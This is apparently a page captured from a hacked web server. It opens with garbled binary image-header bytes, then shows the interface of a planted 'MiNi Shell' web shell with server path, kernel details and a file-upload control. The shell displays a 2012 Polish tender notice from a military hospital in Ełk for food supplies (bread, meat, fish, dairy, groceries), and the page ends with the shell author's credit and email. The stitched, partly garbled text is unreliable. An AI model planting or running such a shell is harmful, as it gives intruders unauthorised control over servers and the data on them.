JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121130/481780-N-2012.html

<p class="kh_header"><b>Ełk: Dostawa artykułów spożywczych, mleka i wyrobów mleczarskich, wyrobów mięsnych i wędliniarskich, drobiu, ryb oraz pieczywa. Numer sprawy: 36/2012-DZP/PNO.</b><br>
<b>Numer ogłoszenia: 481780 - 2012; data zamieszczenia: 30.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 108 Szpital Wojskowy z Przychodnią SP ZOZ , ul. Kościuszki 30, 19-300 Ełk, woj. warmińsko-mazurskie, tel. 087 6219803, faks 087 6219807.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.108spzoz.elk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych, mleka i wyrobów mleczarskich, wyrobów mięsnych i wędliniarskich, drobiu, ryb oraz pieczywa. Numer sprawy: 36/2012-DZP/PNO..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów spożywczych, mleka i wyrobów mleczarskich, wyrobów mięsnych i wędliniarskich, drobiu, ryb oraz pieczywa.
Za produkt równoważny uważa się produkt o gramaturze nie niższej niż podana w opisie przedmiotu zamówienia, posiadający te same walory organoleptyczne - smak, zapach, barwa, estetyka, konsystencja, zawierające w swoim składzie nie gorsze surowce użyte do produkcji. 

Dostawy odbywać się będą w przeciągu 24 godzin od złożenia zamówienia od poniedziałku do piątku w godzinach od 8:00 do 14:00. 

Termin przydatności do spożycia asortymentu określonego w umowie nie będzie krótszy niż połowa okresu przydatności do spożycia przewidzianego dla danego produktu licząc od dnia dostawy

Reklamacje będą załatwiane w terminie 5 dni roboczych.

Wymagania stawiane wykonawcy:

a)	warunki transportu (zgodne z ustawą o bezpieczeństwie żywności i żywienia - Dz. U. z 2006 r. nr 171, poz. 1225 oraz rozporządzeniem w sprawie wymagań sanitarnych dotyczących środków transportu żywności - Dz. U. z 2003 r. nr 21, poz. 179) 
b)	oznakowanie produktu zgodnie z wymaganiami rozporządzenia w sprawie oznakowania środków spożywczych (Dz. U. z 2007 r. nr 137, poz. 966); zgodnie z przepisami tego rozporządzenia oznakowanie musi zawierać: nazwę, pod którą środek jest wprowadzony do obrotu; wykaz i ilość składników lub kategorii składników; zawartość netto w opakowaniu; datę minimalnej trwałości lub termin przydatności do spożycia; warunki przechowywania; firmę i adres producenta lub przedsiębiorcy paczkującego środek spożywczy; nazwę i adres producenta. 
c)	W przypadku dostaw produktów zwierzęcych, mięsa i produktów mięsnych: wykonawca musi posiadać decyzję właściwego organu Inspekcji Weterynaryjnej lub Państwowej Inspekcji Sanitarnej dotyczącej możliwości produkcji lub obrotu danym produktem spożywczym będącym przedmiotem zamówienia;
d)	wykonawca musi posiadać dokument potwierdzający stosowanie systemu HACCP (certyfikat wydany przez jednostkę certyfikującą lub zaświadczenie Państwowego Lekarza Weterynarii); 
e)	warunki transportu muszą być zgodne z zasadami GMP/GHP (GMP jest to Dobra Praktyka Produkcyjna obejmująca działania mające na celu, aby produkcja żywności oraz wyrobów przeznaczonych do kontaktu z żywnością odbywała się w sposób zapewniający bezpieczeństwo żywności, zgodnie z jej przeznaczeniem, GHP Dobra Praktyka Higieniczna obejmuje działania związane z warunkami i środkami podejmowanymi celem zapewnienia produkcji bezpiecznej żywności na wszystkich etapach produkcji) 
f)	dostawy mięsa powinny odbywać się w zamkniętych opakowaniach lub pojemnikach plastikowych z pokrywami, posiadającymi stosowne atesty, pojemnikach plombowanych lub metkowanych, czystych, nieuszkodzonych; 
g)	przy każdej dostawie produktów zwierzęcych, mięsa i produktów mięsnych mleka przetworów mlecznych, ryb dostawca ma obowiązek przedstawić Handlowy dokument identyfikacyjny zgodnie z ustawą o produktach pochodzenia zwierzęcego (Dz. U. z 2006 r. nr 17, poz. 127) oraz rozporządzeniem WE 853/2004 Parlamentu Europejskiego i Rady z 29 kwietnia 2004 r., ustanawiającego szczególne przepisy dotyczące higieny w odniesieniu do żywności pochodzenia zwierzęcego (Dz. Urz. UE L139 z 30 kwietnia 2004 r.)
h)	Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia. 
i)	Wymagana jest należyta staranność przy realizacji zobowiązań umowy, 
j)	Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez zamawiającego z ustanowionym przedstawicielem wykonawcy. 
k)	Określenie przez wykonawcę telefonów kontaktowych i numerów fax. oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia. 
l)	Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez wykonawcę podczas wykonywania przedmiotu zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9, 15.10.00.00-9, 15.50.00.00-3, 15.21.10.00-0, 15.80.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca wraz z ofertą zobowiązany jest złożyć dokuemnty niewymienione powyżej tj: 1 Formularz ofertowy - wypełniony i podpisany przez wykonawcę 2) Formularze cenowe w zakresie wybranych przez wykonawcę zadań od 1 do 6 - wypełnione i podpisane przez wykonawcę 
3) Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień publicznych 4) Zaświadczenie (zgodnie z punktem E.1) lub Oświadczenie dot. jakości oferowanych artykułów 
5)Zaświadczenie (zgodnie z punktem E.2) lub Oświadczenie dot. wdrażania systemu HACCP</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, z zastrzeżeniem postanowień w art. 144 ust. 1 Ustawy Prawo Zamówień Publicznych:
a)	zmian w nazwach lub adresach stron, zmian związanych z przekształceniem podmiotowym stron,
b)	konieczności zmian umowy na skutek działania organów administracji lub instytucji upoważnionych do wydania decyzji albo innych aktów władczych lub nadzorczych, związanych z realizacją przedmiotu umowy,  
c)	zaistnienia siły wyższej uniemożliwiającej okresowe wykonywanie przedmiotu umowy, wystąpienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a w związku z nimi wystąpi konieczność wprowadzenia zmian do umowy, zaś zmiany te są korzystne dla Zamawiającego
d)	zmianę ceny w przypadku zmiany przepisów prawa podatkowego w okresie obowiązywania umowy dotyczących stawek VAT, przy czym zmiana nastąpi w wartości brutto, wartość netto pozostaje bez zmian</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.108spzoz.elk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 108 Szpital Wojskowy z Przychodnią SP ZOZ
Ul. Kościuszki 30
19-300 Ełk
Pokój nr 4 DZIAŁ ZAMÓWIEŃ PUBLICZNYCH.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.12.2012 godzina 09:30, miejsce: 108 Szpital Wojskowy z Przychodnią SP ZOZ
Ul. Kościuszki 30
19-300 Ełk
Pokój nr 22 KANCELARIA OGÓLNA.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 05.01.2013.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr 1 - PIECZYWO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bułka pszenna wrocławska 50 g	kg	1500
Chleb razowy żytni krojony 500 g	kg	1500
Chleb zwykły mieszany krojony   1 kg	kg	5000
Barwa od jasno- do ciemnobrązowej, kształt chleba podłużny, bułek okrągły. Skórka sprężysta z miękiszem o odpowiedniej barwie w zależności od rodzaju asortymentu. Dobrze wypieczony, suchy, nie kruszący się, bez grudek mąki. Powierzchnia skórki gładka nie popękana bez uszkodzeń mechanicznych. Pieczywo powinno się charakteryzować przyjemnym smakiem i zapachem właściwym dla danego rodzaju. Smak pieczywa powinien być przyjemny, a w przypadku pieczywa pszennego lekko słodki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2 - WYROBY MIĘSNE I WĘDLINIARSKIE, DRÓB.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Baleron drobiowy	kg	50
Baleron wieprzowy gotowany	kg	80
Boczek wędzony	kg	15
Ćwiartka tylna z kurczaka	kg	100
Filet z piersi kurczaka świeży	kg	200
Flak wołowy krojony świeży	kg	60
Karczek wieprzowy b/k	kg	150
Karczek wieprzowy z/k	kg	400
Kiełbasa biała surowa	kg	5
Kiełbasa kanapkowa	kg	11,5
Kiełbasa krakowska parzona	kg	100
Kiełbasa szynkowa wieprzowa	kg	100
Kiełbasa zwyczajna/toruńska	kg	150
Kiełbasa żywiecka wieprzowa	kg	50
Kiszka pasztetowa	kg	40
Kurczak cały świeży	kg	1300
Łopatka wieprzowa b/k	kg	500
Łopatka wieprzowa z/k	kg	100
Mielonka tyrolska	kg	100
Mięso wieprzowe drobne	kg	100
Mięso wołowe drobne (gulasz woł.)	kg	270
Mortadela	kg	100
Ogonówka (wędzonka) wieprz.	kg	320
Parówki cienkie (paluszki)	kg	250
Pieczeń rzymska wieprzowa	kg	60
Pierś pieczona z indyka	kg	70
Polędwica drobiowa kanadyjska	kg	250
Polędwica drobiowa z warzywami	kg	250
Polędwica sopocka drobiowa	kg	70
Polędwica sopocka wieprz.	kg	130
Salceson włoski	kg	40
Schab wieprzowy b/k	kg	100
Schab wieprzowy z/k	kg	750
Szynka drobiowa	kg	250
Szynka konserwowa prasowana	kg	280
Szynka wieprzowa gotowana	kg	50
MIĘSO, DRÓB:
Powierzchnia cięć powstała przy podziale półtusz lub ćwierćtusz na części zasadnicze - możliwie gładkie; luźne strzępy mięśni i tłuszczu oraz ewentualne odłamki kości usunięte; niedopuszczalne przekrwienia powierzchniowe. 
Powierzchnia: sucha; dopuszczalna lekko wilgotna; gładka, bez pomiażdżonych kości, głębszych pozacinań; 
Czystość: mięso czyste, bez śladów jakichkolwiek zanieczyszczeń
Barwa: mięśni - jasnoróżowa, jasnoczerwona, czerwona, ciemnoczerwona do brązowowiśniowej; dopuszczalne zmatowienie, tłuszczu - biała do jasnożółtej;
Konsystencja: jędrna i elastyczna
Zapach: swoisty, charakterystyczny dla świeżego mięsa, bez oznak zaparzenia i rozpoczynającego się psucia; niedopuszczalny zapach obcy.
Właściwości: brak zanieczyszczeń chemicznych, brak oznak obecności pleśni

WYROBY WĘDLINIARSKIE: 
Barwa zewnętrzna jednolita typowa dla każdego rodzaju wyrobu.
Konsystencja elastyczna, jędrna, w przekroju widoczne cząstki użytych dodatków 
Zapach typowy dla rodzaju bez obcych posmaków.
Właściwości: brak zanieczyszczeń chemicznych, brak oznak obecności pleśni.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie Nr 3 - RYBY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet śledziowy płaty małosolny	kg	30
Filet śledziowy płaty marynowany	kg	30
Filet z miruny z/k mrożony	kg	350
Filet z pstrąga świeży	kg	40
Karp cały świeży	kg	15
Pstrąg cały świeży	kg	60
Filety:
Konsystencja: jędrna i elastyczna
Skóra błyszcząca i gładka
Zapach: swoisty, charakterystyczny dla filetów rybnych, 
Właściwości: brak zanieczyszczeń chemicznych, brak oznak obecności pleśni

Ryby:
Woń skóry swoista, skóra błyszcząca i gładka,
Łuski połyskujące i mocno osadzone,
Oko nieuszkodzone, błyszczące, 
Powierzchnia cięć u ryby patroszonej błyszcząca,
Skrzela barwy jasnoczerwonej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.31.10.00-2, 15.21.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie Nr 4 - ARTYKUŁY MLECZNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jogurt owocowy 150 g	szt	400
Masło stołowe śmiet. 200 g kostka 82 % tłuszczu	kg	500
Mleko spożywcze 2 % 1 l	l	4000
Mleko w proszku pełne	kg	300
Ser topiony Hochland mixtet / tercet 200 g	szt	30
Ser topiony kostka 100 g	kg	300
Ser twarogowy półtłusty kostka 250 g	kg	500
Ser żółty dojrzewający Gouda/ Podlaski/ Edamski	kg	120
Serek homogeniz Darek 135 g	szt	2000
Śmietana 18 %  400 ml kubek	l	550
Za produkt równoważny uważa się produkt o gramaturze nie niższej niż podana w opisie przedmiotu zamówienia, posiadający te same walory organoleptyczne - smak, zapach, barwa, estetyka, konsystencja, zawierające w swoim składzie nie gorsze surowce użyte do produkcji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie Nr 5 - ARTYKUŁY SPOŻYWCZE NA POTRZEBY KUCHNI SZPITALNEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Budyń waniliowy/śmietankowy	kg	10
Bułka tarta	kg	120
Cukier biały kryształ	kg	850
Dżem wieloowocowy/ marmolada	kg	60
Fasola biała drobna	kg	120
Groch żółty połówki	kg	120
Groszek konserwowy 400 g	kg	50
Herbata granul. Saga 90 g	kg	32
Kasza gryczana	kg	80
Kasza jęczmienna wiejska	kg	450
Kasza manna	kg	200
Kawa zbożowa Kujawianka	kg	160
Kisiel owocowy	kg	10
Koncentrat pomidor. 30 % 0,9 l	kg	250
Kwasek cytrynowy	kg	12
Liść laurowy	kg	3
Majeranek	kg	3
Mak niebieski	kg	2
Makaron świderki Lubella / Rapido	kg	400
Mąka pszenna	kg	700
Mąka ziemniaczana	kg	60
Musztarda delikatesowa/ sarepska	kg	35
Ocet spirytusowy 10 %	l	120
Olej rzepakowy uniwersalny 1l	kg	350
Pieczywo bezglutenowe (ryżowe / kukurydziane)	kg	4
Pieprz czarny mielony	kg	5
Płatki owsiane zwykłe	kg	120
Przyprawa typu kucharek/ warzywko	kg	100
Przyprawa w płynie maggi Winiary	kg	250
Ryż biały	kg	700
Sól kuchenna	kg	400
Syrop owocowy	l	200
Woda mineralna 1,5 l gazowana	szt	1200
Woda mineralna 1,5 l niegazowana	szt	1000
Ziele angielskie	kg	4
Żelatyna	kg	1
Za produkt równoważny uważa się produkt o gramaturze nie niższej niż podana w opisie przedmiotu zamówienia, posiadający te same walory organoleptyczne - smak, zapach, barwa, estetyka, konsystencja, zawierające w swoim składzie nie gorsze surowce użyte do produkcji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie Nr 6 - ARTYKUŁY SPOŻYWCZE NA POTRZEBY SEKRETARIATU.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ciasteczka z marmoladą, biszkopt w czekoladzie Wilczy apetyt lub produkt równoważny	op	24
Ciasteczka z nadzieniem morelowym w czekoladzie Szarotka lub produkt równoważny	op	24
Piernik Lambertz 250g	op	12
Ciastka kruche posypane orzechami Wolność - śnieżynka dek.1kg lub produkt równoważny	kg	12
Ciastka kruche z marmoladą 1kg	kg	12
Milka Crispello	op	24
Słone paluszki Skawina 300g	op	24
Piernik Wedel alpejski 160g	op	12
Cukier	kg	24
Delicje Milka  147g lub produkt równoważny	szt	24
Delicje Wedel 294 g lub produkt równoważny	szt	24
Herbata Dilmah 100g liściasta-zielona lub produkt równoważny	op	24
Herbata Dilmah ex 100szt lub produkt równoważny	op	5
Herbata Lipton  mięt. lub ziel. piram. lub produkt równoważny	szt	10
Herbata Lipton Ex100 lub produkt równoważny	op	20
Herbata Lipton owocowa, piramidki lub produkt równoważny	szt	5
Herbatniki z ziarnami w czekoladzie Milka ChocoGrains 168g lub produkt równoważny	szt	20
Jeżyki-Jutrzenka 140g lub produkt równoważny	op	24
Kawa naturalna mielona Jacobs Kronung 250g lub produkt równoważny	szt	60
Kawa rozpuszczalna Jacobs Gold słoik 200g lub produkt równoważny	szt	5
Kawa rozpuszczalna Jacobs Velvet  słoik 200g lub produkt równoważny	szt	12
Milka herbatniki-choco bis.	szt	12
Mleko łaciate 3,2% 0,5l lub produkt równoważny	szt	98
Śmietanka do kawy 10x10 lub produkt równoważny	op	24
Wafle okrągłe w czekoladzie Milka 180g lub produkt równoważny	szt	20
Wafle torcikowi mini Wedel-150g lub produkt równoważny	op	24
Woda Cisowianka gazowana ? l lub produkt równoważny	szt	120
Woda Cisowianka niegazowana ? l lub produkt równoważny	szt	288
Za produkt równoważny uważa się produkt o gramaturze nie niższej niż podana w opisie przedmiotu zamówienia, posiadający te same walory organoleptyczne - smak, zapach, barwa, estetyka, konsystencja, zawierające w swoim składzie nie gorsze surowce użyte do produkcji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com